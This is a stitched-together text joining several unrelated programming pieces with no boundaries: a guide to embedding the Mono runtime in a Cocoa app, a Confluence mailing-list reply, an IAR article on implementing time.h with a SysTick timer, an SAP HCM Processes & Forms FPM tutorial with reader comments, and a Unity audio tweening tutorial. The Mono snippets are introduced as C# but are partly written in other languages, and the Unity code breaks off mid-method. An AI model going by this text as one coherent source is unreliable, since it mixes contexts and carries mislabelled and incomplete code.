Next, you will want to initialize the Mono runtime and load your dlls. All the following code snippets are RemObjects C#, but the same principles apply no matter what language you use:
var fRuntime: MZMonoRuntime; // class field
...
fRuntime := new MZMonoRuntime withDomain('MyApp') appName('MyApp') version('v4.0.30319') lib('/path/to/mono/lib') etc('/path/to/mono/etc');
MZMonoRuntime _runtime; // class field
...
_runtime = new MZMonoRuntime withDomain("MyApp") appName("MyApp") version("v4.0.30319") lib("/path/to/mono/lib") etc("/path/to/mono/etc");
var _runtime: MZMonoRuntime // class field
...
_runtime = MZMonoRuntime(domain: "MyApp", appName: "MyApp", version: "v4.0.30319", lib: "/path/to/mono/lib", etc: "/path/to/mono/etc")
Rather than hardcoding the paths, you will probably determine them at runtime, for example by looking into your bundle to find the embedded Mono folder in its resources (see below). You will want to hold on to the _runtime instance in a global object, so that it does not get released. That said, once a runtime was instantiated, you can also always access it globally via MZMonoRuntime.sharedInstance.
Next, load in the .dll or .dlls that contain your code, as well as any dependent .dlls that won’t be found on their own:
MZMonoRuntime.sharedInstance.loadAssembly("/path/to/MyManagedCode.dll")
Once again you’ll probably want to determine the paths dynamically.
Finally, as the very last step, you need to make sure to attach Mono to each thread that you want to use it on. If all your code is on the main thread, just call this once; if you create threads or use GCD queues, you’ll need to call it at least once (you can call it again without harm) the first time you call into managed code on any given thread.
Keep in mind that GCD queues will use random/new threads. Even serial queues do not always use the same thread for each block.
MZMonoRuntime.sharedInstance.attachToThread()
And with that, you’re set up and ready to use your own classes as imported. Just new them up (or alloc/init them up) as you always do and call their methods as if they were native Cocoa classes.
Building your .app
There are a couple of items to note for building your .app:
- Most likely, you'll want to embed the Mono folder into your bundle as resource. Just add it to your project. In Visual Studio or Fire, set the build action to "AppResource". In Xcode, make sure to add it as "Folder Reference" (it will show up as blue folder icon, not yellow) and add it to the Copy Files build phase, alongside your other resources.
- You will need to link against libmono-2.0.dylib (or libmono-2.0.fx) and have libmono-2.0.dylib copied into your app bundle into the Frameworks folder. In Xcode, you will need to create a new build phase for it. In Visual Studio or Fire, just set the build action to AppFramework after adding the file to the project (you'll want to add both the .fx file as reference and the .dylib file as resource with the AppFramework build action). Make sure to use the version of libmono-2.0.dylib that's part of your actual Mono build, as the versions need to match.
- You will also need to embed all your .dlls to be packaged into the resource folder, as well (just as regular AppResource file resources).
You can use the following code to locate the Mono folder at runtime for passing to the new MZMonoRuntime ... call shown above:
var lMonoPath := NSBundle.mainBundle.pathForResource('Mono') ofType('');
var monoPath = NSBundle.mainBundle.pathForResource("Mono") ofType("");
let monoPath = NSBundle.mainBundle.pathForResource("Mono", ofType: "")
The same works for locating your .dlls:
var lMyDll := NSBundle.mainBundle.pathForResource('MyManagedAssembly') ofType('dll') inDirectory('');
var myDll = NSBundle.mainBundle.pathForResource("MyManagedAssembly") ofType("dll") inDirectory("");
let myDll = NSBundle.mainBundle.pathForResource("MyManagedAssembly", ofType: "dll", inDirectory: "");
On 10/08/2012, at 12:53 AM, Prasanna Santhanam <prasanna.santhanam@citrix.com> wrote:
>
> There are no issues with the apache confluence. Probably better than
> wiki.cloudstack because it still does wiki markup rather than just
> rich text edits. Pages might look differently-formatted so wanted to
> alert people.
Ah, that's just because it is back on Confluence 3.x. So that might hinder your ability to
import from the newer version - I'm not sure when ASF plans to upgrade but probably not on
a timeline that suits what you're trying to do. Sorry for the misdirection.
If you can find a way around the version difference, the main thing I remember being a challenge
was mapping users. I probably have some notes around if you bump into that.
- Brett
--
Brett Porter
brett@apache.org
In the C standard, there is a defined library on time and date declared in "time.h". The library is not limited to embedded applications, and widely used in order to obtain information about time and date. This library is supported by IAR Embedded Workbench, and in this article we will take a look at how to use it in the toolchain.
The time and date library of the C language is defined in time.h. This header includes data types with respect to time (such as clock_t, time_t, and struct tm), constants (such as CLOCKS_PER_SEC), and functions (such as clock(), time(), mktime(), localtime(), and strftime()).
In embedded systems, you need to write code that calculates the date and time in order to use the time.h functions. We introduce two cases for how to use and implement the time library in IAR Embedded Workbench.
The first case is applicable when using the debugger. Time information is provided from the debugger. The information is not available when the debugger is detached from the target board. The second example shows how to manage the time without using the debugger.
If the debugger is available, the application can use the data/time library, and you do not need to implement anything else in order to manage time information. Below are two code examples: one using clock() and the other using time().
You can get the elapsed time from the system start by using a clock in the following way:
clock_t clk_time;

clk_time = clock();
printf("clock time: %dsec\n", clk_time / CLOCKS_PER_SEC);
You can also use string display conversion to get the date and time:
time_t now;
struct tm *ts;
char buf[80];

now = time(NULL);
ts = localtime(&now);
strftime(buf, sizeof(buf), "%a %Y-%m-%d %H:%M:%S %Z", ts);
printf("%s\n", buf);
This is the result of the above code examples:
clock time: 234sec
Sat 2015-07-11 00:11:40
...
Without the debugger, the application must provide the low-level implementation of the date and time library. If you are using an RTOS, similar functions might be provided and you can use those.
The below example is for an ARM Cortex-M device, which has a Systick timer. The timer makes it easy to implement data and time functions. In this example, SysTick generates an interrupt every 1 msec.
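On a CMSIS-based project, that 1 ms tick is typically requested with a call like the following sketch (the device header name is a placeholder; SysTick_Config and SystemCoreClock are standard CMSIS symbols):

#include "device.h" /* placeholder: your vendor's CMSIS device header */

void tick_init(void)
{
    /* Fire the SysTick interrupt 1000 times per second (every 1 ms). */
    SysTick_Config(SystemCoreClock / 1000);
}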
We define two variables for time and clock and define CLOCKS_PER_SEC as ticks in one second:
#define CLOCKS_PER_SEC (1000)
clock_t clk_count = 0;
time_t time_dat;
We create an interrupt handler for the SysTick. A 64-bit variable is recommended for clk_count to avoid overflow. When an interrupt is generated, clk_count is incremented, and time_dat is incremented once a full second has passed:
void SysTick_Handler(void) {
    clk_count++;
    if ((clk_count % 1000) == 0) {
        time_dat++;
    }
}
Two functions are implemented using variables:
clock_t clock(void) {
    return (clk_count);
}

time_t __time32(time_t *p) {
    return time_dat;
}
The variable "clk_count" is initialized to 0 since clock() returns the elapsed time. The variable "time_dat" should be initialized to the current time. We can use a conversion function to initialize it; this example uses mktime for the conversion:
struct tm orig;

orig.tm_sec = 10;
orig.tm_min = 46;
orig.tm_hour = 9;
orig.tm_mday = 10;
orig.tm_mon = 6;
orig.tm_year = 115;
orig.tm_wday = 5;
orig.tm_yday = 19;
orig.tm_isdst = -1;

time_dat = mktime(&orig);
This gives the date: Fri Jul 10 09:46:10 2015
As a result, every call of the SysTick handler updates the variables. By applying these low level implementations, you can use the clock and time functions on your application.
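Once these hooks are in place, the standard calls need no further glue. A minimal usage sketch (assuming the SysTick setup above):

#include <stdio.h>
#include <time.h>

void print_uptime_and_date(void)
{
    time_t now = time(NULL);
    /* clock() counts ticks since start; CLOCKS_PER_SEC converts to seconds */
    printf("uptime: %lu sec\n", (unsigned long)(clock() / CLOCKS_PER_SEC));
    /* ctime() formats a time_t as a human-readable string with trailing \n */
    printf("date:   %s", ctime(&now));
}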
Standard C library date and time operations implemented in time.h can be used in IAR Embedded Workbench. You can use these functions without writing a low-level implementation by using information provided by the debugger. If you want to use the library without using the debugger, you can implement low-level code as described in this article in order to use the date and time functions.
This article is written by Hiroki Akaboshi, Field Applications Engineer at IAR Systems Japan.
HCM Processes & Forms: Making sense of the new SAP tutorial using FPM
Being “new” to HCM Processes and Forms (HCM P&F) can be daunting enough. Coming in at a time where we now have Adobe Interactive Forms, ABAP Floor Plan Manager (FPM) forms and possibly anything else (since it is pretty “open” now to any 3rd party to build “whatever” as the “data gathering”/form layer) all as possible solutions might qualify you as insane…or at the very least a masochist! (haha) Even those (of us) who might be versed in HCM P&F of the past and have experience with the “old” ways do need to keep up-to-date or be at risk of going the way of the dinosaurs.
With the "new" HR Renewal release with specific content and changes to HCM P&F, the most notable and exciting change in "our world" has to be the additional out-of-the-box/standard possibility of using ABAP WebDynpro forms (views) instead of Adobe Interactive Forms. This does not allow us to just create any old WDA view we like, however. We must do so using the FPM (Floor Plan Manager) framework. If you are used to WebDynpro ABAP programming and have used the FPM framework like some of us, this might come fairly easy. However, if you are not (or you just want to see how the "new" option is incorporated), you will most likely follow SAP's newer HCM P&F tutorial….
“Tutorial: Create a Process Based on FPM Forms“
As you work through the tutorial however, some things are not completely spelled out for you or immediately obvious. I put together this blog to serve as a companion/expansion to the tutorial to hopefully help those working through it to overcome some of the headaches.
First off, if you are wondering why SAP uses the names they do for this tutorial, it is actually quite simple. In this tutorial, you will be instructed to define a form scenario called ZTFSWD and then attach this to a process you define as ZTPRWD. If you look at the naming, it is simply…”Z” for our custom namespace…”T” for tutorial…”FS” for form scenario or “PR” for process…and then “WD” for WebDynpro (you will notice many of the “old” sample processes do not have the “WD” at the end but do have the same naming)…..so, yeh…naming is pretty much up to you. (haha)
So now, let’s address some of the more confusing steps in the tutorial. From the first tutorial steps in,
Configuring a Form Scenario
In the section at the bottom….
Create the Form for a Form Scenario
- In the object hierarchy area, double-click Form. A blank FPM configuration table will appear.
There are four types of FPM configuration, which are as follows:
- Form – Display data using a form. For details, see Creating a Form Layout.
- List – Display or perform operations on repeat fields of a single infotype record. For details, see Creating a List Layout.
- List Complex – Display or perform operations on multiple records of a single infotype. For details, see Creating a List Complex Layout.
- Composite – Group multiple UIBBs within a single UIBB. For details, see Creating a Composite Layout.
- Choose an appropriate FPM configuration type from the FPM configuration table. Enter a configuration ID and description and choose Create.
Step 2 here does not really tell you a whole lot or give you easy to follow instructions. The tutorial tells you all the FPM configuration options available but never says which one to pick or how to do it in order to move on in the tutorial, so try this….
2b. In the first column of the “FPM configuration table”, select: FORM (since we just need a simple form for this).
2c. In the second column ("Configuration ID"), enter your own "key ID" for your configuration. You will find that for HCM P&F, SAP uses the following naming convention:

WD_HRASR_<form id>

For your own, you must name yours in the customer namespace, so start with "Z" or "Y". For ease, I adopt SAP's naming convention and simply add a "Z" to the front:

ZWD_HRASR_<form id>
2d. Add a description in the final column.
2e. click the “create” icon which will then create your actual FPM configuration (you might receive a pop-up window asking if you want to save your form scenario…if so, click the “YES” button). It will open a new browser window (since all FPM config work Is done in your browser and NOT in the SAP GUI).
EDIT: You may receive an error like "Configuration (YOUR CONFIG NAME) does not exist". I do not know why SAP changed this, but you cannot easily create a configuration directly from here as you could when I originally wrote this (even on the version I am working with now, it throws this error). So here are the alternate steps….
- Go to SE80.
- From the “Repository Browser”, select “Web Dynpro Comp. / Intf.
- Now you will need to select the correct WebDynpro component based on what type of UIBB you need. Use the following:
- (C) Composite: FPM_COMPOSITE_UIBB
- (F) Form: FPM_FORM_UIBB_GL2
- (L) List: FPM_LIST_UIBB_ATS (you may only have FPM_LIST_UIBB. This is considered the newer version…ATS stands for ABAP Table Services)
- (M) List Complex: same as list (actually not used in any standard sample processes, nor have I had to use it)
To check these, you can look at standard class CL_HRASR00_DT_FSCN_DATA method CHECK_FORM_SCENARIO_FPM_CONF. You can also see these defined as constants in IF_HRASR00_DT_CONSTANTS.
- After you select the one you need, look at the nodes/folders under it and find “Component Configurations”.
- Right click on that folder and select “Create”.
- This will launch the FLUID application in your web browser.
- Enter your new configuration ID in the right side input box and then click “new” icon.
- This will popup a window asking for the “Description” (just like you saw in the Design Time/HRASR_DT). Enter it and click “OK”.
- You will be asked for the “package” and such as normal for objects and transports.
- Next you will be asked for the feeder class. Enter the standard one used for HCM P&F…. CL_HRASR00_FPM_FEEDER.
- Click “Edit parameters” and enter/select your Form Scenario (and version if needed).
- Click “OK” and click “save” at the top. (You can close the browser now)
- Now, back over to HRASR_DT, you can put in your config ID for the form type selected.
Gee, SAP, thanks for making this soooo much harder now! haha
2f. You now have your FPM configuration to begin “building” your new form/page/screen/thingy.
Now, in the next part from the steps in,
Creating a Form and Editing the Layout
In the section….
Adding Fields to the Form
- Add a header to the form: select the FPM text view field from Repositories and drag and drop it onto the form.
- Enter the text Request Relocation Benefit.
- Save your entries.
You might not have the Repositories view visible. To make them visible, click the icon that looks like vertical split panes in the menu bar (shown in the image below and if you hover over the icon, the tooltip reads “Navigation & Repositories”):
Then from the repositories shown, you can locate the “FPM text view” field to add to the form as instructed.
Drag the field onto your form (ie. the “Preview” window). Then make sure you have your Attributes pane open (if not, click the icon in the menu bar to show attributes). Finally, you can enter the text “Request Relocation Benefit” into the attribute for the element.
You will follow similar steps to add the other fields as the guide instructs.
In the tutorial, you will see that they ask you to add the comments fields (new and previous comments) directly into your configuration. However, you will see in SAP's own examples (and it is a better practice) that they put the comments into a separate configuration that is part of your FPM form configuration table. This is a better way to keep your comments fields consistent across forms, as well as adding extra "nice" features (such as checking if "previous" comments are empty, and if so, simply hiding the field to free up page space, i.e. "screen real estate").
So in my version of the tutorial, I made a separate configuration for comments:
Finally, we create the process in the last tutorial section:
Creating a Process
I will give you a little tip/hint here. You can follow the tutorial exactly as instructed. For the most part, you will be either reusing the workflow you defined if you did the "Non-FPM" tutorial or creating a new one to use for your process (note: you will have to change some of the tasks as the FPM tasks are slightly different, but it is really just switching the "old" standard tasks for the "new" ones). This is very nicely laid out in the tutorial. However, if you want to bypass these steps and get right to testing your new process and FPM form immediately, you can do the following:
- Follow the steps in the tutorial to create the process, assign your form scenario to it and “start step”, assign imitator(s) and other “Start” information.
- In the step where you define the “workflow template” to use, instead of putting in an actual workflow ID, simply put in NO_WORKFLOW. This is an undocumented “feature” that will allow you to immediately launch (and save) a process/form. Keep in mind, this is only useful for testing single form scenario steps and will attempt to change data upon completion based on your configuration.
- Now, you can execute your “start” application, select your process, and test immediately.
- From the Design Time, you can select your process and click the "test" icon.
- Fill in the initial information and make sure to select the option for the "Web Dynpro Screen" at the bottom.
- Execute your test and view your nice new FPM form.
Hope this helps and eases people into HCM P&F a little more comfortably. As always….more blogs to come! You keep reading them, and I will keep churning them out. (haha) Till next time….
Hey Chris.. Thanks for sharing. I'm sure this will come in handy once we get HR Renewal installed (should be very soon). Question: Does this mean all that work we did enabling "Real Time" form field validation and lookups will be obsolete? (:->
First off, THANKS for the thanks. Second....as a good little consultant, I will answer with the consultant's motto..."It depends.". haha There are positive and negative reasons for using an Adobe form over WDA FPM. One that immediately comes to mind is that Adobe forms allow more "responsiveness" via JavaScript (not to mention some creative use of "user events" like we did together). Some of this is not possible with WDA FPM or has to be done in other ways...which opens up LOTS more blog topics for me! haha
Chris a.k.a "the godfather of forms"-
Thanks for another great blog.
Keep up the good work.
Thanks! I will keep going till people stop showing up...just like a true rock star eh? haha
Great work Chris, keep it up.
Thanks!
Nice job (as always) and have always enjoyed your blogging style. Keep up the great work.
On a side for folks that dont know....it was Chris that convinced me to start blogging on SCN many moons ago and so glad he did 🙂
Excellent job, Chris. Really appreciate your attention to detail. Keep it coming!
Thanks, Chris - what a great contribution!!
Awww shucks. Thanks for the kind words. I will keep putting out more as long as nice folks like you keep reading them.
Thanks Chris for nice blog again, Thank you very much!!!
Thanks!
Thank for your sharing on new tech.
Thanks YOU!
Thanks Chris for another good blog.
Hi Chris, Thanks for the great information. Is the tutorial relevant only to EhP 6 with HR Renewal 1.0? You might have said that somewhere and I missed it.
Many thanks! Monica
Yes, Monica...this is the newer HR Renewal based HCM P&F.....I thought I did say it, but really it is the FPM part that is important (as an option instead of Adobe). Thanks for checking it out!
Hi Monica,
The Floor Plan Manager (FPM) is an SAP view-editing tool which is the basis for the "form" editing part of the P&F Design-Time (/HRASR_DT) in the backend. These FPM forms were introduced with HR Renewal 1.0. My thanks to Robert Moeller for his help in answering your question!
Thanks very much Chris, I was just waiting for this blog because I need implement for the first time WDA, this is new to me after working for years on Adobe Forms.
If you worked with the "old" way, you will be just fine. It really isn't much different....just a different "data gathering" UI. haha
Chris,
Did you figure out a way to add a picture in the form. I dont see any option in WD forms like it used to be in Adobe forms.
Regards,
Raghavendra Prabhu
Sorry. Did you figure this out? There is an "image" element you can add. Past that, you could make your own component and include it in the form (like my "Google" blog example you can find on here)
Thanks. Very nice!
A top blog post. I've just tweeting your SCN blog list as it's the must-have SCN resource for HCM Processes and Forms.
Thanks, Luke! I know it is a bit of a niche, but HCM P&F actually does touch a lot of the trickier technical side of HCM these days (decoupled infotypes, FPM framework, OADP, etc.). So even in some of my HCM P&F blogs, there are some nuggets of wisdom (?) that can and do apply to a broader crowd. =)
Chris,
Great tips. I am on a project where they are looking to replace their Adobe P&F with the new FPM forms and I am wondering how much of the existing config and workflow can be re-used. Would you say the Adobe form can be replaced and the existing Workflow and P&F config be re-used?
Regards
Rob Greenway
That is kinda the idea....just replace the "form" portion (UI) and all else remains the same. However, the devil is in the details...there will be some considerations to handle. For instance, if your Adobe forms are really JavaScript heavy, that kind of functionality had to be handled other ways in FPM-based forms. But for the most part, workflow (aside from changing binding names), backend services, and HCM P&F config should not change very much in most cases. I mean the "process" is still the same process after all, I would think. It is just presented in a different way now.
Excellent work as usual, what a good read Chris! So much to learn, I ll keep coming to your shows 🙂 .
Hi Chris,
This is a very good blog for the beginners in HCM Process and Forms using FPM form.All these points are basic but very useful and helpful.Thanks a lot for putting them together,Appreciate you effort!!!Carry on the good work!!!
Hi Chris,
We have Adobe forms on the portal and we now have FPM forms and NWBC. Are they fully interchangeable? I.e., can you run Adobe forms on NWBC and FPM forms on the Enterprise Portal? In all of the SAP documentation it doesn't say you can't, but I wondered if there is some technical reason this can't be done?
Rob.
When you say "interchangeable" how do you mean? It is not as simple as "replace one with the other". There are considerations for each. BUT ....yes, they can be ported over and yes, they both can run in the portal and NWBC. Furthermore, keep in mind that with the release of the FPM option, SAP has now also "left the door open" for ANY other kind of form UI interface (ie. others from 3rd parties for example). I HIGHLY speculate that a HTML5 option will be coming soon as well since SAP is pushing it so much in other areas.
Hi Chris,
indeed it is a great post that helped a lot. The only thing I could not do is increase the size of the current and previous comments fields in the form. Even dragging to make them bigger doesn't help at all. I wonder how you would make it big like a box. Currently it is like a regular input field.
In the "attributes" for your element, look for the Position section. You can set the "start row of element" and "end row of element" to set the HEIGHT and "start column of element" and "end column of element" to set the LENGTH. This allows you to adjust the "box" size of your comments fields.
Thanks Christopher,
Can you please help me in the below issue:
In my case the browser doesn't open, but I get an error "Configuration ZWD_HRASR_XXX does not exist". Do I need to create it before this step? Please guide me.
Regards,
Laxman
Updated blog to reference this.
Thanks Christopher.
Hello Chris.
Very nice and useful blog. I am stuck on your step 2e where you have added an EDIT (in the year 2015) to the original blog. Perhaps system setup has changed today versus when you had your blog posted.
My challenge is that we have two SAP clients; one for development and one for customizing. The Dev client can create the SE80 FPM Configurations and the Customizing client can create the HRASR_DT Form Scenarios.
So after I create FPM configuration in Dev client, I need to link the Feeder Class' parameters to the Form Scenario. Correct? Well, the challenge is that the Form Scenarios are only found in Customizing client, not DEV client. I also cannot go into Customizing client to edit the FPM configuration to do the linking.
So how to link the Form Scenario to the Feeder Class' parameter together when there are two separate clients being used? Without this step, I cannot continue to the Form Layout steps.
Thanks,
Ashish.
You would usually move the transport from one client to other (depending on your own company rules) WITHIN the same "box" using SC01 / SCC1.
Ok, I'll check with Basis if they allow this as we developers don't have access to SCC1. Maybe there is a table that I can search for where the Feeder Class Parameter is linked to the Form Scenario, and then update it directly in the Customizing client through SM30. But surprised that other folks don't have this problem as there isn't much written on this difficulty.
Thanks Chris for the tip.
Ashish.
Hi Christopher,
Thanks a lot for he document.
We have an SSF system for HR and we want to integrate the Process and Forms in Service Requests. For example, we want to load the process and form into the CRM (SSF) system based on categorization. I tried to check some docs but could not find any concrete solution for the same.
Can you please help us on the same! that would great!
Regards,
Dhruvin
This is not related to this blog. Please ask elsewhere (forum discussion?) and what is SSF?
hi Christopher.. apologies 🙂
SSF is shared service framework with which one can access HR , FI , Logistic and can create service tickets and everything in CRM.. so SSF is basically a CRM 7.0 system with HR or FI or logistic.
Ah yeh...got ya now....know what it is.....so many three letter acronyms (TLA) haha
Hi Christopher
Thanks so much for the document and keeping it up to date! I just got through running into the error message on "Object Component Configuration does not exist" and was following the SAP tutorial which does not address this. I really appreciate the fact that you updated your instructions to include how to get past this.
Thanks!
very welcome...Thank you for reading it!
Hi Chris ,
We created a form process and access the form using the application ASR_PROCESS_EXECUTE_OVP and the application configuration ASR_PROCESS_EXECUTE_OVP_CFG. I created a new application configuration and copied the component configuration ASR_PROCESS_EXECUTE_OVP_CFG into a 'Z' configuration because we wanted some custom buttons in the application.
When I add a button to the global toolbar, that button is not appearing on the screen. When I debugged the core WebDynpro component HRASR00_PROCESS_EXEC_ALT, I found out that except for 3 buttons, all the rest are disabled and invisible. Even though I have enabled the button using a code enhancement, I am still not getting the button on the UI. Is there anything I am missing?
Thanks, Ravi.
Hello, someone could suggest to me a book or ebook on ABAP HCM?
Thanks!
Google.
Hello Dhruvin Mehta!
It seems to me the label says that we should first search on Google before asking in the forum, which I have done, if that is a concern.
Well, Google gave me more consistent answers to this.
However, thanks.
Hi Christopher,
I’ve gained a lot of knowledge from your HCM Processes and Forms blogs and appreciate you investing the time and effort to prepare them. Just starting to look at the FPM option and ran into an issue developing my form. I added an Explanation field (FPM_FGL2_EXPLANATION) to my form. I can maintain the field’s Text attribute or its Text Document attribute, and the text will appear in the Preview pane in FLUID. But when I test my process, the Explanation field does not appear. Any idea what might be causing this behavior? There are no attributes for visibility.
Thanks!
Russell
First...THANKS!....Second....sorry, but I can't be much help. I don't use those texts much/often for much the very reason you said. If I want "static" text, but want to control it, I tend to make it a field on my HCM P&F form fields config, then I can set its visibility (as well as text) as I like in a generic service. I think I used the ones like you mention a while back and hit similar issues....don't remember.....deep into a global ESS project so my head has not been in HCM P&F in a while. haha
Thanks for the quick response. I will try the generic service approach.
Sadly all your links now fail to resolve; it looks like SAP have updated their site, so your links are no longer valid...! It's a shame, as the official tutorials that SAP produces are opaque and not very helpful at all.
They are just the links to the exact spot in the tutorial in the SAP "help" documentation. You should be able to figure out where they go based on the section in the blog and description. .....and yes, agreed....SAP has problems with breaking links without a "redirect" backup plan. =)
Audio Animation
Audio is just data and it has attributes that you can and probably will animate. Primarily you will animate volume. This can allow you to fade a track in or out, or crossfade between two music tracks, etc. We already have a reusable animation system in this project which we can easily extend for this feature. Add a new script called AudioSourceVolumeTweener and copy the following:
using UnityEngine;
using System.Collections;

public class AudioSourceVolumeTweener : Tweener
{
    public AudioSource source
    {
        get
        {
            if (_source == null)
                _source = GetComponent<AudioSource>();
            return _source;
        }
        set
        {
            _source = value;
        }
    }
    protected AudioSource _source;

    protected override void OnUpdate ()
    {
        base.OnUpdate ();
        source.volume = currentValue;
    }
}
Because the Tweener inherits from an EasingControl, it already has startValue, currentValue, and endValue fields. All we need is a float value to animate the volume of an audio source, so we can use these values directly – we simply pass the currentValue of the tweener to the AudioSource’s volume field in the OnUpdate callback and we’re done!
In order to trigger the animation of an AudioSource’s volume, it would be nice to add some more extensions like we have done for animating transforms, etc. Add another script named AudioSourceAnimationExtensions and copy the following:
using UnityEngine;
using System;
using System.Collections;

public static class AudioSourceAnimationExtensions
{
    public static Tweener VolumeTo (this AudioSource s, float volume)
    {
        return VolumeTo(s, volume, Tweener.DefaultDuration);
    }

    public static Tweener VolumeTo (this AudioSource s, float volume, float duration)
    {
        return VolumeTo(s, volume, duration, Tweener.DefaultEquation);
    }

    public static Tweener VolumeTo (this AudioSource s, float volume, float duration, Func<float, float, float, float> equation)
    {
        AudioSourceVolumeTweener tweener = s.gameObject.AddComponent<AudioSourceVolumeTweener>();
        tweener.source = s;
        tweener.startValue = s.volume;
        tweener.endValue = volume;
        tweener.duration = duration;
        tweener.equation = equation;
        tweener.Play ();
        return tweener;
    }
}
Hopefully this pattern will look familiar, we simply overloaded the VolumeTo method with a few different sets of parameters so you could be increasingly specific about “how” the volume changed. You may only care about the target volume level, but you might also want to choose how long it takes to get there or with what kind of animation curve it animates along. The less specific versions pass default values to the most specific version so that you only really implement the function once.
Cross Fade Demo
For example sake, here is a sample script which cross fades between two audio sources using our new Tweener subclass and extension. This script wont be included in the repository and it is included merely to demonstrate the potential use of our new feature.
using UnityEngine;
using System.Collections;

public class CrossFadeAudioDemo : MonoBehaviour
{
    [SerializeField] AudioSource fadeInSource;
    [SerializeField] AudioSource fadeOutSource;

    void Start ()
    {
        fadeInSource.volume = 0;
        fadeOutSource.volume = 1;
        fadeInSource.Play();
        fadeOutSource.Play();
        fadeInSource.VolumeTo(1);
        fadeOutSource.VolumeTo(0);
    }
}
If you would like to test this demo, I would recommend you create a new scene. Next, add two audio sources which are preconfigured to use different audio clips. I set both of the audio sources to NOT play on awake so I could configure them first. Don’t forget to hook up the references for them to this script in the inspector. Press play. When the scene starts, it will configure one of the sources to have no volume and fade in, while the other will start at full volume and fade out. If you like you can add additional parameters to the VolumeTo statements such as providing a longer duration so that the effect is more obvious.
Audio Events
One feature I would love to see in Unity is a greater use of event driven programming. For example, it would be great to know when an audio source loops or completes playing. Lacking that, I can accomplish what I need with either a scheduled callback or a polling system. To schedule a callback you can use something like MonoBehaviour.Invoke and or MonoBehaviour.InvokeRepeating as a replacement for the lack of any completion event on the audio source. If you’re curious, those snippets might look something like the following:
float delay = source.clip.length - source.time;
if (source.loop)
    InvokeRepeating("AudioSourceLooped", delay, source.clip.length);
else
    Invoke("AudioSourceCompleted", delay);
Unfortunately I found that this was a pretty fragile approach. One problem is that an Audio Clip’s length in seconds doesn’t necessarily equate to how long an Audio Source will spend playing it. For example, if the pitch of an audio source is modified, then it can play the clip in more or less time depending on the new pitch.
Because I didn’t feel like running a bunch of tests on all of the variety of things which could potentially modify time in one form or another to mess up the timing with the invoke call, I decided to use the polling approach instead. This pattern is achieved through a coroutine. Add a new script called AudioTracker and copy the following:
using UnityEngine;
using System;
using System.Collections;

public class AudioTracker : MonoBehaviour
{
    #region Actions
    // Triggers when an audiosource isPlaying changes to true (play or unpause)
    public Action<AudioTracker> onPlay;

    // Triggers when an audiosource isPlaying changes to false without completing (pause)
    public Action<AudioTracker> onPause;

    // Triggers when an audiosource isPlaying changes to false (stop or played to end)
    public Action<AudioTracker> onComplete;

    // Triggers when an audiosource repeats
    public Action<AudioTracker> onLoop;
    #endregion

    #region Fields & Properties
    // If true, will automatically stop tracking an audiosource when it stops playing
    public bool autoStop = false;

    // The source that this component is tracking
    public AudioSource source { get; private set; }

    // The last tracked time of the audiosource
    private float lastTime;

    // The last tracked value for whether or not the audioSource was playing
    private bool lastIsPlaying;

    const string trackingCoroutine = "TrackSequence";
    #endregion

    #region Public
    public void Track(AudioSource source)
    {
        Cancel();
        this.source = source;
        if (source != null)
        {
            lastTime = source.time;
            lastIsPlaying = source.isPlaying;
            StartCoroutine(trackingCoroutine);
        }
    }

    public void Cancel()
    {
        StopCoroutine(trackingCoroutine);
    }
    #endregion

    #region Private
    IEnumerator TrackSequence ()
    {
        while (true)
        {
            yield return null;
            SetTime(source.time);
            SetIsPlaying(source.isPlaying);
        }
    }

    void AudioSourceBegan ()
    {
        if (onPlay != null)
        {
            onPlay(this);
        }
    }

    void AudioSourceLooped ()
    {
        if (onLoop != null)
            onLoop(this);
    }

    void AudioSourceCompleted ()
    {
        if (onComplete != null)
            onComplete(this);
    }

    void AudioSourcePaused ()
    {
        if (onPause != null)
            onPause(this);
    }

    void SetIsPlaying (bool isPlaying)
    {
        if (lastIsPlaying == isPlaying)
            return;
        lastIsPlaying = isPlaying;

        if (isPlaying)
            AudioSourceBegan();
        else if (Mathf.Approximately(source.time, 0))
            AudioSourceCompleted();
        else
            AudioSourcePaused();

        if (isPlaying == false && autoStop == true)
            StopCoroutine(trackingCoroutine);
    }

    void SetTime (float time)
    {
        if (lastTime > time)
        {
            AudioSourceLooped();
        }
        lastTime = time;
    }
    #endregion
}
When you use this script it will cause a coroutine to track the playback of the audiosource on a frame by frame basis. Note that this means you won't catch the exact moment that a bit of audio has completed or looped, but it should at least be very close – a game even running at 30 fps would be within a few hundredths of a second in accuracy. I would also point out that even if you could get an event at the exact moment an audio track completes, you would be unlikely to do much anyway since it would occur outside of Unity's execution thread and you wouldn't be able to interact with any Unity objects.
It is important to note that several of the callbacks can be invoked by more than one audio event. For example, you would get the onPlay callback anytime the audiosource changes the isPlaying flag to true. This can happen either when Playing an audiosource for the first time, or as a result of Unpausing a paused audiosource. If you needed to know for certain how a callback was obtained (such as differentiating between “unpause” and “play”, or between a play to the end and “stop”) then you would need to wrap the relevant AudioSource methods. For example, you could implement a “Stop” method on the tracker, which then tells the tracked source to “Stop”, so that you would now be able to determine you had manually stopped playback instead of letting it play to the end and stopping on its own. I decided not to wrap these calls because it would be too easy to forget to use them and missed expectations might lead to some frustrating logic bugs.
I feel a lot more comfortable with this version over “Invoke”, because it doesn’t make any assumptions about the timing of the audio… well except for looping. You could always set the playback time manually which could cause the script to think it had looped. Otherwise, it should handle all of the use cases I can think of off the top of my head.
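If you did want to tell a manual stop apart from natural completion, a sketch of the wrapping idea (not included in the repository; the flag name is illustrative) might look like this inside AudioTracker:

bool manuallyStopped; // hypothetical field, checked before raising onComplete

public void Stop ()
{
    manuallyStopped = true;
    source.Stop();
}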
Loop Demo
Like the earlier demo, the following script also wont be included in the repository and it is included merely to demonstrate the potential use of audio events for looping and completion. In this demo, I setup a temporary scene with two audio sources. One was configured with the sound of a laser blast, and the other an explosion. Both audiosources were set not to play on awake, and the laser had loop enabled.
If you setup a similar scene and play it, you will see that the laser sound will play some random number of times (based on the loopCount variable) and on each loop, the loopStep variable will increment and I will change the pitch of the laser so that the next play through happens in a different amount of time (but also adds a nice bit of variance – you could do this for a lot of sound fx like footsteps, etc). When the desired number of loops has been achieved we disable the looping and wait for the audio source to complete. When that event is triggered I tell the explosion audio source to play.
using UnityEngine;
using System.Collections;

public class LoopDemo : MonoBehaviour
{
    [SerializeField] AudioSource laser;
    [SerializeField] AudioSource explosion;

    AudioTracker tracker;
    int loopCount, loopStep;

    void Start ()
    {
        loopCount = Random.Range(4, 10);
        tracker = gameObject.AddComponent<AudioTracker>();
        tracker.onLoop = OnLoop;
        tracker.Track(laser);
        laser.Play();
    }

    void OnLoop (AudioTracker sender)
    {
